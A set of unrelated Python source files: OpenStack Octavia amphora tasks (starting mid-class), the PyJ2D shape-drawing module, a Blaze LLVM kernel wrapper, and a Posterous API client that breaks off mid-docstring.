def revert(self, listener, *args, **kwargs):
"""Handle a failed listener delete."""
LOG.warning("Reverting listener delete.")
self.task_utils.mark_listener_prov_status_error(
listener[constants.LISTENER_ID])
class AmphoraGetInfo(BaseAmphoraTask):
"""Task to get information on an amphora."""
def execute(self, amphora):
"""Execute get_info routine for an amphora."""
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
self.amphora_driver.get_info(db_amp)
class AmphoraGetDiagnostics(BaseAmphoraTask):
"""Task to get diagnostics on the amphora and the loadbalancers."""
def execute(self, amphora):
"""Execute get_diagnostic routine for an amphora."""
self.amphora_driver.get_diagnostics(amphora)
class AmphoraFinalize(BaseAmphoraTask):
"""Task to finalize the amphora before any listeners are configured."""
def execute(self, amphora):
"""Execute finalize_amphora routine."""
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora.get(constants.ID))
self.amphora_driver.finalize_amphora(db_amp)
LOG.debug("Finalized the amphora.")
def revert(self, result, amphora, *args, **kwargs):
"""Handle a failed amphora finalize."""
if isinstance(result, failure.Failure):
return
LOG.warning("Reverting amphora finalize.")
self.task_utils.mark_amphora_status_error(
amphora.get(constants.ID))
class AmphoraPostNetworkPlug(BaseAmphoraTask):
"""Task to notify the amphora post network plug."""
def execute(self, amphora, ports):
"""Execute post_network_plug routine."""
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
for port in ports:
net = data_models.Network(**port.pop(constants.NETWORK))
ips = port.pop(constants.FIXED_IPS)
fixed_ips = []
for ip in ips:
subnet_arg = ip.pop(constants.SUBNET)
host_routes = subnet_arg.get('host_routes')
if host_routes:
subnet_arg['host_routes'] = [
data_models.HostRoute(**hr)
for hr in host_routes
]
fixed_ips.append(data_models.FixedIP(
subnet=data_models.Subnet(**subnet_arg), **ip))
self.amphora_driver.post_network_plug(
db_amp, data_models.Port(network=net, fixed_ips=fixed_ips,
**port))
LOG.debug("post_network_plug called on compute instance "
"%(compute_id)s for port %(port_id)s",
{"compute_id": amphora[constants.COMPUTE_ID],
"port_id": port[constants.ID]})
def revert(self, result, amphora, *args, **kwargs):
"""Handle a failed post network plug."""
if isinstance(result, failure.Failure):
return
LOG.warning("Reverting post network plug.")
self.task_utils.mark_amphora_status_error(amphora.get(constants.ID))
class AmphoraePostNetworkPlug(BaseAmphoraTask):
"""Task to notify the amphorae post network plug."""
def execute(self, loadbalancer, added_ports):
"""Execute post_network_plug routine."""
amp_post_plug = AmphoraPostNetworkPlug()
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
for amphora in db_lb.amphorae:
if amphora.id in added_ports:
amp_post_plug.execute(amphora.to_dict(),
added_ports[amphora.id])
def revert(self, result, loadbalancer, added_ports, *args, **kwargs):
"""Handle a failed post network plug."""
if isinstance(result, failure.Failure):
return
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
LOG.warning("Reverting post network plug.")
for amphora in filter(
lambda amp: amp.status == constants.AMPHORA_ALLOCATED,
db_lb.amphorae):
self.task_utils.mark_amphora_status_error(amphora.id)
class AmphoraPostVIPPlug(BaseAmphoraTask):
"""Task to notify the amphora post VIP plug."""
def execute(self, amphora, loadbalancer, amphorae_network_config):
"""Execute post_vip_routine."""
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora.get(constants.ID))
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
vrrp_port = data_models.Port(
**amphorae_network_config[
amphora.get(constants.ID)][constants.VRRP_PORT])
# Required for noop-case
vip_arg = copy.deepcopy(
amphorae_network_config[
amphora.get(constants.ID)][constants.VIP_SUBNET])
if vip_arg:
host_routes = vip_arg.get('host_routes')
if host_routes:
vip_arg['host_routes'] = [
data_models.HostRoute(**hr)
for hr in host_routes
]
vip_subnet = data_models.Subnet(**vip_arg)
else:
vip_subnet = data_models.Subnet()
self.amphora_driver.post_vip_plug(
db_amp, db_lb, amphorae_network_config, vrrp_port=vrrp_port,
vip_subnet=vip_subnet)
LOG.debug("Notified amphora of vip plug")
def revert(self, result, amphora, loadbalancer, *args, **kwargs):
"""Handle a failed amphora vip plug notification."""
if isinstance(result, failure.Failure):
return
LOG.warning("Reverting post vip plug.")
self.task_utils.mark_amphora_status_error(amphora.get(constants.ID))
class AmphoraePostVIPPlug(BaseAmphoraTask):
"""Task to notify the amphorae post VIP plug."""
def execute(self, loadbalancer, amphorae_network_config):
"""Execute post_vip_plug across the amphorae."""
amp_post_vip_plug = AmphoraPostVIPPlug()
db_lb = self.loadbalancer_repo.get(
db_apis.get_session(), id=loadbalancer[constants.LOADBALANCER_ID])
for amphora in db_lb.amphorae:
amp_post_vip_plug.execute(amphora.to_dict(),
loadbalancer,
amphorae_network_config)
class AmphoraCertUpload(BaseAmphoraTask):
"""Upload a certificate to the amphora."""
def execute(self, amphora, server_pem):
"""Execute cert_update_amphora routine."""
LOG.debug("Upload cert in amphora REST driver")
key = utils.get_compatible_server_certs_key_passphrase()
fer = fernet.Fernet(key)
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora.get(constants.ID))
self.amphora_driver.upload_cert_amp(
db_amp, fer.decrypt(server_pem.encode('utf-8')))
# TODO(johnsom) REMOVE ME!
class AmphoraUpdateVRRPInterface(BaseAmphoraTask):
"""Task to get and update the VRRP interface device name from amphora."""
def execute(self, amphora, timeout_dict=None):
try:
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
interface = self.amphora_driver.get_interface_from_ip(
db_amp, db_amp.vrrp_ip, timeout_dict=timeout_dict)
except Exception as e:
# This can occur when an active/standby LB has no listener
LOG.error('Failed to get amphora VRRP interface on amphora '
'%s. Skipping this amphora as it is failing due to: '
'%s', amphora.get(constants.ID), str(e))
self.amphora_repo.update(db_apis.get_session(),
amphora.get(constants.ID),
status=constants.ERROR)
return None
self.amphora_repo.update(db_apis.get_session(), amphora[constants.ID],
vrrp_interface=interface)
return interface
class AmphoraIndexUpdateVRRPInterface(BaseAmphoraTask):
"""Task to get and update the VRRP interface device name from amphora."""
def execute(self, amphora_index, amphorae, timeout_dict=None):
amphora_id = amphorae[amphora_index][constants.ID]
try:
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora_id)
interface = self.amphora_driver.get_interface_from_ip(
db_amp, db_amp.vrrp_ip, timeout_dict=timeout_dict)
except Exception as e:
# This can occur when an active/standby LB has no listener
LOG.error('Failed to get amphora VRRP interface on amphora '
'%s. Skipping this amphora as it is failing due to: '
'%s', amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
return None
self.amphora_repo.update(db_apis.get_session(), amphora_id,
vrrp_interface=interface)
return interface
class AmphoraVRRPUpdate(BaseAmphoraTask):
"""Task to update the VRRP configuration of an amphora."""
def execute(self, loadbalancer_id, amphorae_network_config, amphora,
amp_vrrp_int, timeout_dict=None):
"""Execute update_vrrp_conf."""
# Note, we don't want this to cause a revert as it may be used
# in a failover flow with both amps failing. Skip it and let
# health manager fix it.
amphora_id = amphora[constants.ID]
try:
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora_id)
loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
id=loadbalancer_id)
db_amp.vrrp_interface = amp_vrrp_int
self.amphora_driver.update_vrrp_conf(
loadbalancer, amphorae_network_config, db_amp, timeout_dict)
except Exception as e:
LOG.error('Failed to update VRRP configuration amphora %s. '
'Skipping this amphora as it is failing to update due '
'to: %s', amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
LOG.debug("Uploaded VRRP configuration of amphora %s.", amphora_id)
class AmphoraIndexVRRPUpdate(BaseAmphoraTask):
"""Task to update the VRRP configuration of an amphora."""
def execute(self, loadbalancer_id, amphorae_network_config, amphora_index,
amphorae, amp_vrrp_int, timeout_dict=None):
"""Execute update_vrrp_conf."""
# Note, we don't want this to cause a revert as it may be used
# in a failover flow with both amps failing. Skip it and let
# health manager fix it.
amphora_id = amphorae[amphora_index][constants.ID]
try:
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora_id)
loadbalancer = self.loadbalancer_repo.get(db_apis.get_session(),
id=loadbalancer_id)
db_amp.vrrp_interface = amp_vrrp_int
self.amphora_driver.update_vrrp_conf(
loadbalancer, amphorae_network_config, db_amp, timeout_dict)
except Exception as e:
LOG.error('Failed to update VRRP configuration amphora %s. '
'Skipping this amphora as it is failing to update due '
'to: %s', amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
return
LOG.debug("Uploaded VRRP configuration of amphora %s.", amphora_id)
class AmphoraVRRPStart(BaseAmphoraTask):
"""Task to start keepalived on an amphora.
This will reload keepalived if it is already running.
"""
def execute(self, amphora, timeout_dict=None):
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
db_amp = self.amphora_repo.get(
db_apis.get_session(), id=amphora[constants.ID])
self.amphora_driver.start_vrrp_service(db_amp, timeout_dict)
LOG.debug("Started VRRP on amphora %s.", amphora[constants.ID])
class AmphoraIndexVRRPStart(BaseAmphoraTask):
"""Task to start keepalived on an amphora.
This will reload keepalived if it is already running.
"""
def execute(self, amphora_index, amphorae, timeout_dict=None):
# TODO(johnsom) Optimize this to use the dicts and not need the
# DB lookups
amphora_id = amphorae[amphora_index][constants.ID]
db_amp = self.amphora_repo.get(db_apis.get_session(), id=amphora_id)
try:
self.amphora_driver.start_vrrp_service(db_amp, timeout_dict)
except Exception as e:
LOG.error('Failed to start VRRP on amphora %s. '
'Skipping this amphora as it is failing to start due '
'to: %s', amphora_id, str(e))
self.amphora_repo.update(db_apis.get_session(), amphora_id,
status=constants.ERROR)
return
LOG.debug("Started VRRP on amphora %s.",
amphorae[amphora_index][constants.ID])
class AmphoraComputeConnectivityWait(BaseAmphoraTask):
"""Task to wait for the compute instance to be up."""
def execute(self, amphora, raise_retry_exception=False):
"""Execute get_info routine for an amphora until it responds."""
try:
db_amphora = self.amphora_repo.get(
db_apis.get_session(), id=amphora.get(constants.ID))
amp_info = self.amphora_driver.get_info(
db_amphora, raise_retry_exception=raise_retry_exception)
LOG.debug('Successfuly connected to amphora %s: %s',
amphora.get(constants.ID), amp_info)
except driver_except.TimeOutException:
LOG.error("Amphora compute instance failed to become reachable. "
"This either means the compute driver failed to fully "
"boot the instance inside the timeout interval or the "
"instance is not reachable via the lb-mgmt-net.")
self.amphora_repo.update(db_apis.get_session(),
amphora.get(constants.ID),
status=constants.ERROR)
raise
class AmphoraConfigUpdate(BaseAmphoraTask):
"""Task to push a new amphora agent configuration to the amphora."""
def execute(self, amphora, flavor):
# Extract any flavor based settings
if flavor:
topology = flavor.get(constants.LOADBALANCER_TOPOLOGY,
CONF.controller_worker.loadbalancer_topology)
else:
topology = CONF.controller_worker.loadbalancer_topology
# Build the amphora agent config
agent_cfg_tmpl = agent_jinja_cfg.AgentJinjaTemplater()
agent_config = agent_cfg_tmpl.build_agent_config(
amphora.get(constants.ID), topology)
db_amp = self.amphora_repo.get(db_apis.get_session(),
id=amphora[constants.ID])
# Push the new configuration to the amphora
try:
self.amphora_driver.update_amphora_agent_config(db_amp,
agent_config)
except driver_except.AmpDriverNotImplementedError:
LOG.error('Amphora {} does not support agent configuration '
'update. Please update the amphora image for this '
'amphora. Skipping.'.
format(amphora.get(constants.ID)))
|
|
#PyJ2D - Copyright (C) 2011 James Garnon <https://gatc.ca/>
#Released under the MIT License <https://opensource.org/licenses/MIT>
from math import pi as _pi
from java.awt import BasicStroke, RenderingHints
from java.awt.geom import Ellipse2D
from pyj2d.rect import Rect
from pyj2d.color import Color
__docformat__ = 'restructuredtext'
__doc__ = 'Draw shapes'
_rad_deg = 180.0/_pi
_return_rect = True
def rect(surface, color, rect, width=0):
"""
Draw rectangle shape, and returns bounding Rect.
Arguments include surface to draw, color, Rect.
Optional width argument of outline, which defaults to 0 for filled shape.
"""
if not hasattr(rect, 'width'):
rect = Rect(rect)
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
if width:
g.setStroke(BasicStroke(width))
g.drawRect(rect.x, rect.y, rect.width, rect.height)
else:
g.fillRect(rect.x, rect.y, rect.width, rect.height)
g.dispose()
if not _return_rect:
return None
return surface.get_rect().clip(rect)
def circle(surface, color, position, radius, width=0):
"""
Draw circular shape, and returns bounding Rect.
Arguments include surface to draw, color, position and radius.
Optional width argument of outline, which defaults to 0 for filled shape.
"""
rect = Rect(position[0]-radius, position[1]-radius, 2*radius, 2*radius)
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
if width:
g.setStroke(BasicStroke(width))
g.drawOval(rect.x, rect.y, rect.width, rect.height)
else:
g.fillOval(rect.x, rect.y, rect.width, rect.height)
g.dispose()
if not _return_rect:
return None
return surface.get_rect().clip(rect)
def ellipse(surface, color, rect, width=0):
"""
Draw ellipse shape, and returns bounding Rect.
Arguments include surface to draw, color, and rect.
Optional width argument of outline, which defaults to 0 for filled shape.
"""
if not hasattr(rect, 'width'):
rect = Rect(rect)
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
ellipse = Ellipse2D.Double(rect.x, rect.y, rect.width, rect.height)
if width:
g.draw(ellipse)
else:
g.fill(ellipse)
g.dispose()
if not _return_rect:
return None
return surface.get_rect().clip(rect)
def arc(surface, color, rect, start_angle, stop_angle, width=1):
"""
Draw arc shape, and returns bounding Rect.
Arguments include surface to draw, color, rect, start_angle, stop_angle.
Optional width argument of outline.
"""
if not hasattr(rect, 'width'):
rect = Rect(rect)
start_angle = int(start_angle * _rad_deg)
stop_angle = int(stop_angle * _rad_deg)
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
if width:
g.setStroke(BasicStroke(width))
g.drawArc(rect.x, rect.y, rect.width-1, rect.height-1,
start_angle, stop_angle)
else:
g.fillArc(rect.x, rect.y, rect.width-1, rect.height-1,
start_angle, stop_angle)
g.dispose()
if not _return_rect:
return None
return surface.get_rect().clip(rect)
def polygon(surface, color, pointlist, width=0):
"""
Draw polygon shape, and returns bounding Rect.
Arguments include surface to draw, color, and pointlist.
Optional width argument of outline, which defaults to 0 for filled shape.
"""
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
xpts = [int(pt[0]) for pt in pointlist]
ypts = [int(pt[1]) for pt in pointlist]
npts = len(pointlist)
if width:
g.setStroke(BasicStroke(width))
g.drawPolygon(xpts, ypts, npts)
else:
g.fillPolygon(xpts, ypts, npts)
g.dispose()
if not _return_rect:
return None
xmin = min(xpts)
xmax = max(xpts)
ymin = min(ypts)
ymax = max(ypts)
rect = Rect(xmin, ymin, xmax-xmin+1, ymax-ymin+1)
return surface.get_rect().clip(rect)
def line(surface, color, point1, point2, width=1):
"""
Draw line, and returns bounding Rect.
Arguments include surface to draw, color, point1, point2.
Optional width argument of line.
"""
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
g.setStroke(BasicStroke(width))
g.drawLine(int(point1[0]), int(point1[1]),
int(point2[0]), int(point2[1]))
g.dispose()
if not _return_rect:
return None
xpts = [pt[0] for pt in (point1, point2)]
ypts = [pt[1] for pt in (point1, point2)]
xmin = min(xpts)
xmax = max(xpts)
ymin = min(ypts)
ymax = max(ypts)
rect = Rect(xmin, ymin, xmax-xmin+1, ymax-ymin+1)
return surface.get_rect().clip(rect)
def lines(surface, color, closed, pointlist, width=1):
"""
Draw interconnected lines, and returns Rect bound.
Arguments include surface to draw, color, closed, and pointlist.
Optional width argument of line.
"""
xpoints = [int(p[0]) for p in pointlist]
ypoints = [int(p[1]) for p in pointlist]
if closed:
xpoint, ypoint = xpoints[0], ypoints[0]
xpoints.append(xpoint)
ypoints.append(ypoint)
npoints = len(xpoints)
g = surface.createGraphics()
if hasattr(color, 'a'):
g.setColor(color)
else:
g.setColor(Color(color))
g.setRenderingHint(RenderingHints.KEY_ANTIALIASING,
RenderingHints.VALUE_ANTIALIAS_ON)
g.setStroke(BasicStroke(width))
g.drawPolyline(xpoints, ypoints, npoints)
g.dispose()
if not _return_rect:
return None
xmin = min(xpoints)
xmax = max(xpoints)
ymin = min(ypoints)
ymax = max(ypoints)
rect = Rect(xmin, ymin, xmax-xmin+1, ymax-ymin+1)
return surface.get_rect().clip(rect)
def aaline(surface, color, point1, point2, blend=1):
"""
Draw line, and returns bounding Rect.
Arguments include surface to draw, color, point1, point2.
"""
rect = line(surface, color, point1, point2)
return rect
def aalines(surface, color, closed, pointlist, blend=1):
"""
Draw interconnected lines, and returns Rect bound.
Arguments include surface to draw, color, closed, and pointlist.
"""
rect = lines(surface, color, closed, pointlist)
return rect
def bounding_rect_return(setting):
"""
Set whether draw functions return bounding Rect.
Setting (bool) defaults to True on module initialization.
"""
global _return_rect
_return_rect = setting
#depreciated
def _set_return(*args):
msg = 'set_return depreciated, use bounding_rect_return'
raise Exception(msg)
set_return = _set_return
|
|
"""
A Blaze Element Kernel is a wrapper around an LLVM Function with a
particular signature.
The kinds of argument types are simple, ptr, and array.
A kernel kind is a tuple of input kinds followed by the output kind
simple: out_type @func(in1_type %a, in2_type %b)
ptrs: void @func(in1_type * %a, in2_type * %b, out_type * %out)
array_0: void @func(in1_array0 * %a, in2_array0 * %b, out_array0* %out)
array_1: void @func(in1_array1 * %a, in2_array1 * %b, out_array1* %out)
array_2: void @func(in1_array2 * %a, in2_array2 * %b, out_array2* %out)
where array_n is one of the array_kinds in llvm_array
Notice that while the examples have functions with all the
same kinds, the kind is a per-argument notion and thus
can be mixed and matched.
"""
from __future__ import absolute_import, division, print_function
import sys
import llvm.core as lc
from llvm.core import Function, Module
from llvm import LLVMException
from blaze.py2help import _strtypes
from .. import llvm_array as lla
from ..llvm_array import (void_type, SCALAR, POINTER, array_kinds, check_array,
get_cpp_template, array_type)
from .llutil import map_llvm_to_ctypes
from .jit_ckernel import jit_compile_ckernel_deferred
arg_kinds = (SCALAR, POINTER) + array_kinds
_g = globals()
for this in array_kinds:
_g[lla.kind_to_str(this)] = this
del this, _g
_invmap = {}
class BlazeElementKernel(object):
"""
A wrapper around an LLVM Function object
But, Blaze Element Kernels may be re-attached to different LLVM
modules as needed using the attach method.
To inline functions we can either:
1) Execute f.add_attribute(lc.ATTR_ALWAYS_INLINE) to always inline
a particular function 'f'
2) Execute llvm.core.inline_function(callinst) on the output of the
call function when the function is used.
If dshapes is provided then this will be a seq of data-shape objects
which can be helpful in generating a ctypes-callable wrapper
otherwise the dshape will be inferred from llvm function (but this
loses information like the sign).
"""
_ee = None
_dshapes = None
_lifted_cache = {}
_shape_func = None
def __init__(self, func, dshapes=None):
if not isinstance(func, Function):
raise ValueError("Function should be an LLVM Function."\
" Try a converter method.")
self.func = func
# We are forcing blaze functions to fully inline
func.add_attribute(lc.ATTR_ALWAYS_INLINE)
# Convert the LLVM function type into arguments
func_type = func.type.pointee
self.argtypes = func_type.args
self.return_type = func_type.return_type
kindlist = [None]*func_type.arg_count
# The output may either via the function's
# return, or if the function is void, an
# extra pointer argument at the end.
if func_type.return_type != void_type:
kindlist.append(SCALAR)
for i, arg in enumerate(func_type.args):
if not isinstance(arg, lc.PointerType):
kindlist[i] = SCALAR
else: # kind is a tuple if an array
kind = check_array(arg.pointee)
if kind is None:
kind = POINTER
kindlist[i] = kind
self._kinds = tuple(kindlist)
# Keep a handle on the module object
self.module = func.module
self._init_dshapes(dshapes)
@property
def kinds(self):
"""An array of 'kinds' describing the parameters the
kernel function accepts. Each kind may be SCALAR, POINTER,
or a 3-tuple (array_kind, ndim, llvm_eltype).
"""
return self._kinds
def _init_dshapes(self, dshapes):
if dshapes is None:
# Create dshapes from llvm if none provided
from datashape.util import from_llvm
ds = [from_llvm(llvm, kind)
for llvm, kind in zip(self.argtypes, self.kinds)]
if self.kinds[-1] == SCALAR:
ds.append(from_llvm(self.return_type))
self._dshapes = tuple(ds)
self.ranks = [len(el) - 1 if el else 0 for el in ds]
else:
for i, kind in enumerate(self.kinds):
if isinstance(kind, tuple) and kind[0] in array_kinds and \
len(dshapes[i]) == 1 and not kind[1] == 0:
raise ValueError("Non-scalar function argument "
"but scalar rank in argument %d" % i)
self._dshapes = tuple(dshapes)
self.ranks = [len(el) - 1 for el in dshapes]
@property
def dshapes(self):
return self._dshapes
def _get_ctypes(self):
import sys
if self.return_type == void_type:
out_type = None
indx = slice(None)
else:
out_type = map_llvm_to_ctypes(self.return_type)
indx = slice(None,-1)
names = []
for x in self.dshapes[indx]:
if hasattr(x, 'measure'):
name = str(x.measure)
elif hasattr(x, 'name'):
name = str(x.name)
else:
name = None
names.append(name)
mod = sys.modules['blaze']
modules = [mod]*len(names)
argtypes = [refresh_name(typ, self.module) for typ in self.argtypes]
return out_type, map(map_llvm_to_ctypes, argtypes, modules, names)
@property
def nin(self):
return len(self.kind) - 1
@property
def shapefunc(self):
"""a.shapefunc(*shapes)
This function maps argument shapes to an output shape,
using the dshape signature of the blaze kernel. It does
this by matching the TypeVar shapes in the input datashapes
which have a corresponding entry in the output datashape.
"""
if self._shape_func is None:
if self.ranks[-1] == 0:
self._shape_func = lambda *args: ()
else:
symbols = [[sh.symbol for sh in dshape.shape]
for dshape in self.dshapes]
outshapes = []
for symbol in symbols[-1]:
# Find first occurrence of symbol in other shapes
for i, arg in enumerate(symbols[:-1]):
try:
index = arg.index(symbol)
break
except ValueError:
continue
outshapes.append((i, index))
#outshapes is a list of tuples where first argument is which arg
#and second is which dim
def shape_func(*args):
shape = tuple(args[i][j] for i,j in outshapes)
return shape
self._shape_func = shape_func
return self._shape_func
@staticmethod
def fromcfunc(cfunc):
raise NotImplementedError
def make_ckernel_deferred(self, out_dshape):
return jit_compile_ckernel_deferred(self, out_dshape)
# Should probably check to ensure kinds still match
def replace_func(self, func):
self.func = func
self._ee = None
self.module = func.module
def attach(self, module):
"""Update this kernel to be attached to a particular module
Return None
"""
if not isinstance(module, Module):
raise TypeError("Must provide an LLVM module object to attach kernel")
if module is self.module: # Already attached
return
try:
# This assumes unique names for functions and just
# replaces the function with one named from module
# Should check to ensure kinds still match
self.replace_func(module.get_function_named(self.func.name))
return
except LLVMException:
pass
# Link the module the function is part of to this module
new_module = self.func.module.clone()
module.link_in(new_module)
# Re-set the function object to the newly linked function
self.replace_func(module.get_function_named(self.func.name))
def get_eltype(argtype, kind):
if kind == SCALAR:
return argtype
elif kind == POINTER:
return argtype.pointee
else: # Array
return argtype.pointee.elements[0].pointee
# Currently only works for scalar kernels
def frompyfunc(pyfunc, signature, dshapes=None):
import numba
from datashape.util import from_numba
if isinstance(signature, _strtypes):
jitter = numba.jit(signature)
elif isinstance(signature, tuple):
jitter = numba.jit(restype=signature[1], argtypes=signature[0])
elif isinstance(signature, list):
jitter = numba.jit(argtypes=signature)
else:
raise ValueError("Signature must be list, tuple, "
"or string, not %s" % type(signature))
numbafunc = jitter(pyfunc)
if dshapes is None:
dshapes = [from_numba(arg) for arg in numbafunc.signature.args]
dshapes.append(from_numba(numbafunc.signature.return_type))
krnl = BlazeElementKernel(numbafunc.lfunc, dshapes)
return krnl
def fromcpp(source):
import tempfile, os, subprocess
header = get_cpp_template()
fid_cpp, name_cpp = tempfile.mkstemp(suffix='.cpp', text=True)
os.write(fid_cpp, header + source)
os.close(fid_cpp)
args = ['clang','-S','-emit-llvm','-O3','-o','-',name_cpp]
p1 = subprocess.Popen(args, stdout=subprocess.PIPE)
assembly, err = p1.communicate()
if err:
raise RuntimeError("Error trying to compile", err)
os.remove(name_cpp)
llvm_module = Module.from_assembly(assembly)
# Always get the first function ---
# assume it is source
# FIXME: We could improve this with an independent
# parser of the source file
func = llvm_module.functions[0]
krnl = BlazeElementKernel(func)
# Use default llvm dshapes --
# could improve this with a parser of source
return krnl
def fromctypes(func, module=None):
if func.argtypes is None:
raise ValueError("ctypes function must have argtypes and restype set")
if module is None:
names = [arg.__name__ for arg in func.argtypes]
names.append(func.restype.__name__)
name = "mod__{0}_{1}".format(func.__name__, '_'.join(names))
module = Module.new(name)
raise NotImplementedError
def refresh_name(_llvmtype, module=None):
if (_llvmtype.kind == lc.TYPE_POINTER and
_llvmtype.pointee.kind == lc.TYPE_STRUCT and
_llvmtype.pointee.name == ''):
res = lla.check_array(_llvmtype.pointee)
if res is None:
return _llvmtype
kindnum, nd, eltype = res
_llvmtype = lc.Type.pointer(array_type(nd, kindnum, eltype, module))
return _llvmtype
|
|
# Copyright:
# Copyright (c) 2010, Benjamin Reitzammer <http://github.com/nureineide>,
# All rights reserved.
#
# License:
# This program is free software. You can distribute/modify this program under
# the terms of the Apache License Version 2.0 available at
# http://www.apache.org/licenses/LICENSE-2.0.txt
from datetime import datetime
from posterous.parsers import ModelParser
from posterous.bind import bind_method
from posterous.utils import *
class API(object):
def __init__(self, username=None, password=None,
host='https://posterous.com', api_root='/api', parser=None):
self.username = username
self.password = password
self.host = host
self.api_root = api_root
self.parser = parser or ModelParser()
## API methods
"""
Required arguments:
'path' - The API method's URL path.
The optional arguments available are:
'method' - The HTTP request method to use: "GET", "POST",
"DELETE" ... Defaults to "GET" if argument
is not provided.
'payload_type' - The name of the Model class that will retain and
parse the response data.
'payload_list' - If True, a list of 'payload_type' objects is returned.
'response_type' - Determines which parser to use. Set to 'json' if the
response is in JSON format. Defaults to 'xml' if not
specified.
'allowed_param' - A list of params that the API method accepts. Must be
formatted as a list of tuples, with the param name
being paired with the expected value type. If more
than one type is allowed, place the types in a tuple.
'require_auth' - True if the API method requires authentication.
"""
## API token
"""Returns the API token for the user"""
get_api_token = bind_method(
path = '2/auth/token',
payload_type = 'apitoken',
allowed_param = [],
response_type = 'json',
require_auth = True
)
## Reading
"""
Retrieve a site's posts
"""
retrieve_posts = bind_method(
path = '2/sites/site_id/posts',
payload_type = 'postv2',
payload_list = True,
response_type = 'json',
url_param = [('site_id', int)],
allowed_param = [
('page', int),
('since_id', int),
('tag', basestring),
('api_token', basestring)],
require_auth = True
)
"""
Retrieve a site's public posts
"""
retrieve_public_posts = bind_method(
path = '2/sites/site_id/posts/public',
payload_type = 'postv2',
payload_list = True,
response_type = 'json',
url_param = [('site_id', int)],
allowed_param = [
('page', int),
('since_id', int),
('tag', basestring),
('api_token', basestring)],
require_auth = False
)
"""
Returns a list of all sites owned and authored by the
authenticated user.
"""
get_sites = bind_method(
path = 'getsites',
payload_type = 'site',
payload_list = True,
allowed_param = [],
require_auth = True
)
"""
Returns a list of posts. Authentication is optional.
If it's not authenticated, either the site_id or hostname
is required and only public posts will be returned.
"""
read_posts = bind_method(
path = 'readposts',
payload_type = 'post',
payload_list = True,
allowed_param = [
('site_id', int),
('hostname', basestring),
('num_posts', int),
('page', int),
('tag', basestring)],
require_auth = False
)
read_posts_v2 = bind_method(
path = '2/users/me/sites/primary/posts',
payload_type = 'postv2',
payload_list = True,
response_type = 'json',
allowed_param = [
('page', int),
('since_id', int),
('tag', basestring),
('api_token', basestring)],
require_auth = False
)
"""
Returns a post by interacting with the Post.ly API.
The id param must be in Post.ly shortcode.
(Example: 123abc in http://post.ly/123abc)
Authentication is required if the post is private.
"""
get_post = bind_method(
path = 'getpost',
payload_type = 'post',
allowed_param = [('id', basestring)],
require_auth = False
)
get_post_v2 = bind_method(
path = '2/users/me/sites/primary/posts/id',
payload_type = 'postv2',
response_type = 'json',
url_param = [('id', int)],
allowed_param = [('api_token', basestring)],
require_auth = False
)
"""
Returns a list of all post tags. Authentication is
optional. If it's not authenticated, either the site_id or
hostname is required and only tags in public posts/sites
will be returned.
"""
get_tags = bind_method(
path = 'gettags',
payload_type = 'tag',
payload_list = True,
allowed_param = [
('site_id', int),
('hostname', basestring)],
require_auth = False
)
"""
Returns a list of all comments for a post. Authentication is
optional.
Uses Posterous API version 2.
"""
get_comments_v2 = bind_method(
path = '2/users/me/sites/primary/posts/id/responses',
payload_type = 'commentv2',
payload_list = True,
response_type = 'json',
url_param = [('id', int)],
allowed_param = [('api_token', basestring)],
require_auth = True
)
## Posting
"""
Creates a new post and returns a post object.
The media param must be set to file data. If posting
multiple files, provide a list of file data.
"""
new_post = bind_method(
path = 'newpost',
method = 'POST',
payload_type = 'post',
allowed_param = [
('site_id', int),
('title', basestring),
('body', basestring),
('media', (basestring, list)),
('autopost', bool),
('private', bool),
('date', datetime),
('tags', basestring),
('source', basestring),
('sourceLink', basestring)],
require_auth = True
)
"""
Returns an updated post.
The media param must be set to file data. If posting
multiple files, provide a list of file data.
"""
update_post = bind_method(
path = 'updatepost',
method = 'POST',
payload_type = 'post',
allowed_param = [
('post_id', int),
('title', basestring),
('body', basestring),
('media', (basestring, list))],
require_auth = True
)
"""
Returns a comment with its accompanying post.
If a name is not provided, the authenticated user will
